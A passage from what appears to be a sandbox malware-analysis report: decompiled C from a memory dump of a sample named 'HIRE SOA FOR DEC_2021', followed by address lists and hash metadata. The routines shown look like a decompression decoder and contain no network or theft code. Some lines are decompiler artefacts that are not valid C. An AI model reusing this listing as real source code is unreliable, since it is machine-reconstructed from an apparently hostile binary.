											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406682
0x00406682
0x00406686
0x004066ab
0x004066b5
0x00000000
0x00406688
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406695
0x00406699
0x00406699
0x0040669c
0x00406776
0x00406776
0x0040677d
0x0040677d
0x00406780
0x00406787
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x00000000
0x004068bc
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x00000000
0x004060d9
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x004066b8
0x004066b8
0x00000000
0x00000000
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00000000
0x0040676f
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00000000
0x00000000
0x00406830
0x00406833
0x00406734
0x00406734
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x00000000
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x004068d2
0x004068d8
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00406811
0x00000000
0x00406686

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406398 Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406398() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
